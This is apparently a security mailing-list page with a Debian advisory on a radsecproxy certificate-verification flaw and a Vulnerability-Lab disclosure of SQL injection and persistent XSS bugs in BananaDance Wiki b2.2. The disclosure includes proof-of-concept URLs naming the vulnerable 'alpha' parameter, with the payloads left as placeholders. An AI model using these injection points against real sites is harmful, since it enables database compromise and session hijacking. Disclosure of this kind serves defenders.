[SECURITY] [DSA 2573-1] radsecproxy security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2573-1 secur...@debian.org http://www.debian.org/security/ Luciano Bello November 10, 2012 http://www.debian.org/security/faq - - Package: radsecproxy Vulnerability : SSL certificate verification weakness Problem type : remote Debian-specific: no CVE ID : CVE-2012-4523 CVE-2012-4566 Ralf Paffrath reported that Radsecproxy, a RADIUS protocol proxy, mixed up pre- and post-handshake verification of clients. This vulnerability may wrongly accept clients without checking their certificate chain under certain configurations. Raphael Geissert spotted that the fix for CVE-2012-4523 was incomplete, giving origin to CVE-2012-4566. Both vulnerabilities are fixed with this update. Notice that this fix may make Radsecproxy reject some clients that are currently (erroneously) being accepted. For the stable distribution (squeeze), these problems have been fixed in version 1.4-1+squeeze1. For the testing distribution (wheezy), these problems have been fixed in version 1.6.2-1. For the unstable distribution (sid), these problems have been fixed in version 1.6.2-1. We recommend that you upgrade your radsecproxy packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAlCeylIACgkQQWTRs4lLtHkHaACcDHUTL37Y/8wTylt4xFSkwJVJ BI0AoIVkG7fkhBYWb7VEAIDSK5kjRHqJ =N4xn -END PGP SIGNATURE-
BananaDance Wiki b2.2 - Multiple Web Vulnerabilities
Title:
==
BananaDance Wiki b2.2 - Multiple Web Vulnerabilities
Date:
=
2012-11-10
References:
===
http://www.vulnerability-lab.com/get_content.php?id=745
VL-ID:
=
745
Common Vulnerability Scoring System:
7.1
Introduction:
=
Banana Dance is an open-source PHP/MySQL-based program. It is designed to
combine the simplicity of wiki-publishing
software with the versatility of a CMS. The program also promotes
community-building through organized and
user-rated commenting features. Highly flexible with theme-integration and
extension availability Banana Dance
can be used for all types of purposes, whether it be to create an entire
website, a product owner`s manual, or
an `article`-posting site.
(Copy of the Vendor Homepage: http://www.bananadance.org )
Abstract:
=
The vulnerability Laboratory Research Team discovered multiple web
vulnerabilities in the official BananaDance Wiki b2.2 CMS.
Report-Timeline:
2012-11-10: Public or Non-Public Disclosure
Status:
Published
Exploitation-Technique:
===
Remote
Severity:
=
High
Details:
1.1
A SQL Injection vulnerability is detected in the BananaDance Wiki B2.2 Content
Management System.
The vulnerability allows an attacker (remote) or local privileged
moderator/admin user account to execute own
SQL commands on the affected application dbms. The sql injection vulnerability
is located in user management module
with the bound vulnerable alpha listing parameter. Successful exploitation of
the vulnerability results in dbms
application compromise. Exploitation requires no user interaction without
privileged user account.
Vulnerable Module(s):
[+] User Management
Vulnerable Parameter(s):
[+] alpha
1.2
Multiple persistent input validation vulnerabilities are detected in the
BananaDance Wiki B2.2 Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent) of the vulnerable module.
The persistent vulnerabilities are located in the user, banned user, badge
module listing with the bound vulnerable username and email parameters.
Successful exploitation of the vulnerability can lead to session hijacking
(manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user inter action (view listing) a registered low
privileged web application user account.
Vulnerable Module(s):
[+] Add User - Listing
[+] Banned User - Listing
[+] Badges - Listing
Vulnerable Parameter(s):
[+] Username Email (Profil)
Proof of Concept:
=
1.1
The sql injection vulnerability can be exploited by local privileged user
accounts and moderators.
For demonstration or reproduce ...
PoC:
html
headbody
titleBananaDance Wiki b2.2 - SQL Vulnerability/title
iframe
src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=A'-1
[SQL-INJECTION!]-- width=1000 height=800
iframe
src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=M'-1
[SQL-INJECTION!]-- width=1000 height=800
iframe
src=http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=usersalpha=K'-1
[SQL-INJECTION!]-- width=1000 height=800
/body/head
html
1.2
The persistent input validation vulnerabilities can be exploited by remote
attacker with low privileged application user account and
low required user inter action. For demonstration or reproduce ...
Review: Add (Existing) User - Listing
tr id=19
td valign=topcenterimg src=imgs/status-on.png id=status19
alt=Active title=Active border=0 height=16 width=16/center/td
td valign=topa href=index.php?l=users_editid=19[PERSISTENT
EXECUTION OF INJECTED SCRIPT CODE!];) = a=/td
td valign=top2012-06-20/td
td valign=topspan style=ESTANDAR/span/td
td valign=top0/td
td valign=top0/td
td valign=top0/td
td valign=topa href=# onClick=deleteID('bd_users','19');return false;
img src=imgs/icon-delete.png border=0 alt=Delete title=Delete
//a/td
/tr
URL(s):
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users_add
Risk:
=
1.1
The security risk of the local sql injection vulnerability is estimated as
medium(+) because of the required moderator account.
1.2
The security risk of the persistent input validation vulnerabilities are
estimated as high.
Credits:
Vulnerability Laboratory [Research Team] - Kathrin SL
(ka...@vulnerability-lab.com)
Disclaimer:
===
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a
